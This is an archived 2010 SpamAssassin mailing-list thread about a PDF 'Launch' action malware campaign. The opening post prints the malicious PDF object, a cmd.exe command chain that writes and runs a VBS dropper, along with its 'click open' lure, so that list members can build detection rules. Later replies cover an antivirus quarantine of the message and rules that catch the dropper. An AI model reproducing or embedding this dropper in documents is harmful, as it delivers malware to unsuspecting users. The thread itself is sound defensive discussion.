You are viewing a plain text version of this content. The canonical link for it is here.

Posted to users@spamassassin.apache.org by "Chip M." <sa...@IowaHoneypot.com> on 2010/04/28 20:01:29 UTC

new PDF "Launch" malware exploit (with sample)

About a month ago, Didier Stevens found a nifty way to exploit
PDFs, using their "launch action".

Original article:
	http://blog.didierstevens.com/2010/03/29/escape-from-pdf/
More info:
	http://www.sophos.com/blogs/sophoslabs/?p=9301

Yesterday morning, several of these showed up in my feeds.
Sample:
	http://puffin.net/software/spam/samples/0007_pdf_mal.txt


The bad news is that the social engineering part is well written
(terse with decent grammer in the body) and feels like the sort of
thing that would confuse/fool naive endusers.

Based on which accounts they're hitting, these may have been
created by last year's inline-PNG/RTF guy (who I'm pretty sure
is behind the recent zipped JPEG and now RTF campaigns).
If that's correct, we should expect more attacks.  He's smarter
AND more patient than pretty much all other spammers (he might
even be as smart as a tree squirrel - scary!).


The good news is there's all manner of easy to detect stuff that
shouldn't occur in "normal" PDFs. :)

Here's just the nifty Launch part (NOTE: for skimming clarity, I
removed several blank lines from around the original "Click" line):

8 0 obj
<<
 /Type /Action
 /S /Launch
 /Win
 <<
  /F (cmd.exe)
  /P (/c echo Set fso=CreateObject("Scripting.FileSystemObject") > script.vbs && echo Set f=fso.OpenTextFile("doc.pdf", 1, True) >> script.vbs && echo pf=f.ReadAll  >> script.vbs && echo s=InStr(pf,"'SS")  >> script.vbs && echo e=InStr(pf,"'EE")  >> script.vbs && echo s=Mid(pf,s,e-s)  >> script.vbs && echo Set z=fso.OpenTextFile("batscript.vbs", 2, True)  >> script.vbs && echo s = Replace(s,"%","") >> script.vbs && echo z.Write(s) >> script.vbs && script.vbs && batscript.vbs
Click the "open" button to view this document:)
 >>
>>
endobj


I haven't seen any since the first blast, so I suspect their
signatures were widely distributed by most anti-virus orgs.

I'm mainly publishing this for all of us who like to have backup
rules, and are willing to be more general than the sometimes too
tightly focused malware sigs.

For example, I've added "script.vbs" to my instant-death PDF word
scans.

I'll be asking some of my most diverse volunteers to run some
ham-PDF-only MassChecks tonight, and see if any of my new rules
mis-fire.  Given the number of times HTML "naughty" tags appear in
ham, I will resist assuming my "reasonable" restrictions won't hit
any.
	- "Chip"

Re: new PDF "Launch" malware exploit (with sample)

Posted by Benny Pedersen <me...@junc.org>.

On ons 28 apr 2010 20:01:29 CEST, "Chip M." wrote

> About a month ago, Didier Stevens found a nifty way to exploit
> PDFs, using their "launch action".

when you get more add them here http://www.clamav.net/

-- 
xpoint http://www.unicom.com/pw/reply-to-harmful.html

Re: new PDF "Launch" malware exploit (with sample)

Posted by Bob Proulx <bo...@proulx.com>.

Rosenbaum, Larry M. wrote:
> > d.hill wrote:
> > Um... The OP did not send malware to the list. A link was supplied to
> > the original message. You must have a scanner set up to follow links.
> > That isn't a good idea, in my opinion.
> 
> There was some code in the message, right after the "Here's just the
> nifty Launch part" paragraph.  Perhaps it's not dangerous in a text
> message, but Forefront didn't like it anyway.

This was a false positive in your scanner.  It was safe as written by
the original poster.

Bob

RE: new PDF "Launch" malware exploit (with sample)

Posted by "Rosenbaum, Larry M." <ro...@ornl.gov>.

> From: d.hill@yournetplus.com [mailto:d.hill@yournetplus.com]
> Sent: Wednesday, April 28, 2010 2:29 PM
> To: users@spamassassin.apache.org
> Subject: RE: new PDF "Launch" malware exploit (with sample)
> 
> Quoting "Rosenbaum, Larry M." <ro...@ornl.gov>:
> 
> > Please don't send live malware samples to the list.
> 
> Um... The OP did not send malware to the list. A link was supplied to
> the original message. You must have a scanner set up to follow links.
> That isn't a good idea, in my opinion.

There was some code in the message, right after the "Here's just the nifty Launch part" paragraph.  Perhaps it's not dangerous in a text message, but Forefront didn't like it anyway.

> >> -----Original Message-----
> >> From: Chip M. [mailto:sa_chip@IowaHoneypot.com]
> >> Sent: Wednesday, April 28, 2010 2:01 PM
> >> To: users@spamassassin.apache.org
> >> Subject: new PDF "Launch" malware exploit (with sample)
> >>
> >> FILE QUARANTINED
> >>
> >> Microsoft Forefront Security for Exchange Server removed a file
> since
> >> it was found to be infected.
> >> File name: "Body of Message"
> >> Virus name: "TrojanDropper:Win32/Pidrop.A"
> >
> 
>

RE: new PDF "Launch" malware exploit (with sample)

Posted by d....@yournetplus.com.

Quoting "Rosenbaum, Larry M." <ro...@ornl.gov>:

> Please don't send live malware samples to the list.

Um... The OP did not send malware to the list. A link was supplied to  
the original message. You must have a scanner set up to follow links.  
That isn't a good idea, in my opinion.

>> -----Original Message-----
>> From: Chip M. [mailto:sa_chip@IowaHoneypot.com]
>> Sent: Wednesday, April 28, 2010 2:01 PM
>> To: users@spamassassin.apache.org
>> Subject: new PDF "Launch" malware exploit (with sample)
>>
>> FILE QUARANTINED
>>
>> Microsoft Forefront Security for Exchange Server removed a file since
>> it was found to be infected.
>> File name: "Body of Message"
>> Virus name: "TrojanDropper:Win32/Pidrop.A"
>

RE: new PDF "Launch" malware exploit (with sample)

Posted by "Rosenbaum, Larry M." <ro...@ornl.gov>.

Please don't send live malware samples to the list.

> -----Original Message-----
> From: Chip M. [mailto:sa_chip@IowaHoneypot.com]
> Sent: Wednesday, April 28, 2010 2:01 PM
> To: users@spamassassin.apache.org
> Subject: new PDF "Launch" malware exploit (with sample)
> 
> FILE QUARANTINED
> 
> Microsoft Forefront Security for Exchange Server removed a file since
> it was found to be infected.
> File name: "Body of Message"
> Virus name: "TrojanDropper:Win32/Pidrop.A"

Re: new PDF "Launch" malware exploit (with sample)

Posted by Yet Another Ninja <sa...@alexb.ch>.

On 2010-04-28 20:01, Chip M. wrote:
> I haven't seen any since the first blast, so I suspect their
> signatures were widely distributed by most anti-virus orgs.
> 
> I'm mainly publishing this for all of us who like to have backup
> rules, and are willing to be more general than the sometimes too
> tightly focused malware sigs.
> 
> For example, I've added "script.vbs" to my instant-death PDF word
> scans.

If you still have PDFinfo in your plugin collection:

https://svn.apache.org/repos/asf/spamassassin/trunk/rulesrc/sandbox/axb/20_axb_pdf.cf

should hit on these in case AVs don't